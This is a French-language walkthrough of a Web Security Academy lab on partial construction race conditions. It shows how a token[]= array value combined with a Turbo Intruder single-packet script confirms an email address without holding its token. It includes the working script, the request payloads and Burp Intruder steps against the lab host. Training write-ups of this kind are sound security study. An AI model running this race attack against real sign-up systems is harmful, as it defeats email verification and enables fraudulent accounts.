Race condition en construction partielle

Partial construction race conditions

Lab: Partial construction race conditions | Web Security AcademyWebSecAcademy

Objectif du lab

Le site propose un mécanisme d’inscription avec vérification d’email.
Une condition de course permet de bypasser la vérification et de s’inscrire avec une adresse arbitraire.
But final : créer un compte, se connecter, puis supprimer l’utilisateur carlos.

Contexte observé (inscription)

Message côté UI : “If you work for GinAndJuice, please use your @ginandjuice.shop email address”.

Tentative de création de compte avec l’email fourni par le lab → réponse “invalid email address”.

Tentative avec un email conforme, ex. [email protected] → réponse :

“Please check your emails for your account registration link”.

csrf=HggS13aIQlQSXW9Tdhh1NmOGrSYIalTN&username=wiener&email=wiener%40exploit-0ad00064047bcce1804a250e017f00f9.exploit-server.net&password=peter

Analyse du fonctionnement (resources/users.js)

Dans users.js, on voit :

Le formulaire de register envoie username, email, password.
La confirmation d’email est réalisée via un POST vers :
- POST /confirm?token=...
Le token est extrait de l’URL et injecté dans l’action du form de confirmation.

Conclusion : la validation dépend d’un endpoint /confirm avec un token transmis en query string.

const createRegistrationForm = () => {
    const form = document.getElementById('user-registration');

    const usernameLabel = document.createElement('label');
    usernameLabel.textContent = 'Username';
    const usernameInput = document.createElement('input');
    usernameInput.required = true;
    usernameInput.type = 'text';
    usernameInput.name = 'username';

    const emailLabel = document.createElement('label');
    emailLabel.textContent = 'Email';
    const emailInput = document.createElement('input');
    emailInput.required = true;
    emailInput.type = 'email';
    emailInput.name = 'email';

    const passwordLabel = document.createElement('label');
    passwordLabel.textContent = 'Password';
    const passwordInput = document.createElement('input');
    passwordInput.required = true;
    passwordInput.type = 'password';
    passwordInput.name = 'password';

    const button = document.createElement('button');
    button.className = 'button';
    button.type = 'submit';
    button.textContent = 'Register';

    form.appendChild(usernameLabel);
    form.appendChild(usernameInput);
    form.appendChild(emailLabel);
    form.appendChild(emailInput);
    form.appendChild(passwordLabel);
    form.appendChild(passwordInput);
    form.appendChild(button);
}

const confirmEmail = () => {
    const container = document.getElementsByClassName('confirmation')[0];

    const parts = window.location.href.split("?");
    const query = parts.length == 2 ? parts[1] : "";
    const action = query.includes('token') ? query : "";

    const form = document.createElement('form');
    form.method = 'POST';
    form.action = '/confirm?' + action;

    const button = document.createElement('button');
    button.className = 'button';
    button.type = 'submit';
    button.textContent = 'Confirm';

    form.appendChild(button);
    container.appendChild(form);
}

Première piste et blocage

Tentative de forcer une confirmation vide :

POST /confirm?token=token

Réponse : Forbidden → endpoint protégé contre token vide “classique”.

Contournement de la protection (interprétation alternative)

Race conditions | Web Security AcademyWebSecAcademy

Nouvelle tentative :

/confirm?token[]=

Réponse : “Incorrect token: Array”
- Interprétation : le backend ne bloque plus “comme Forbidden”, il traite la valeur (mais signale qu’elle est un tableau).

Observation des timings

La requête register est plus lente :
~ 199 ms

La requête confirm est plus rapide :

~ 78 ms

Idée : bombarder /confirm?token[]= pendant la fenêtre où le compte est en cours de création, pour déclencher une confirmation “au mauvais moment”.

Exploitation

Méthode 1 — Intruder “classique” (concurrence)

Envoyer la requête POST /confirm?token[]= dans Intruder.

Configurer l’envoi en requêtes concurrentes (ex. 10).

Pendant ce spam, depuis Repeater (ou navigateur), créer plusieurs comptes :
- test1, test2, test3, … test7

Vérifier les réponses d’Intruder :

Une des réponses finit par retourner 200

Essayer de se connecter avec les comptes test :

Succès observé (ex. test2).

Méthode 2 — Turbo Intruder (Race single packet attack)

Sélectionner une requête et l’envoyer à Turbo Intruder.

Choisir l’attaque race / single packet.

Utiliser ce script :

Principe du script (tel qu’appliqué ici) :

Mettre en file plusieurs registrations (usernames lol0..lol19)
Mettre en file beaucoup de confirmations (/confirm?token[]=)
Ouvrir la “gate” pour déclencher la condition de course.

def queueRequests(target, wordlists):
    engine = RequestEngine(
        endpoint=target.endpoint,
        concurrentConnections=1,
        engine=Engine.BURP2
    )

    confirmation_email = '''POST /confirm?token[]= HTTP/2
Host: 0a0700db04dacc3080b6262500af004e.web-security-academy.net
Cookie: phpsessionid=sOwKShdkHig4oxnUpwlWZ82vFl6rwdom
Content-Length: 0

'''

    gate_name = "race1"

    for i in range(20):
        username = "lol" + str(i)
        engine.queue(target.req, [username], gate=gate_name)

    for j in range(50):
        engine.queue(confirmation_email, [], gate=gate_name)

    engine.openGate(gate_name)


def handleResponse(req, interesting):
    table.add(req)

Résultat attendu

Au moins un compte est créé comme si l’email était confirmé (sans posséder le token).
On peut alors se connecter avec ce compte, puis utiliser les fonctionnalités du compte pour atteindre l’objectif du lab (suppression de carlos).

Mis à jour il y a 1 mois

hashtagPartial construction race conditions

hashtagObjectif du lab

hashtagContexte observé (inscription)

hashtagAnalyse du fonctionnement (resources/users.js)

hashtagPremière piste et blocage

hashtagContournement de la protection (interprétation alternative)

hashtagObservation des timings

hashtagExploitation

hashtagMéthode 1 — Intruder “classique” (concurrence)

hashtagMéthode 2 — Turbo Intruder (Race single packet attack)

hashtagRésultat attendu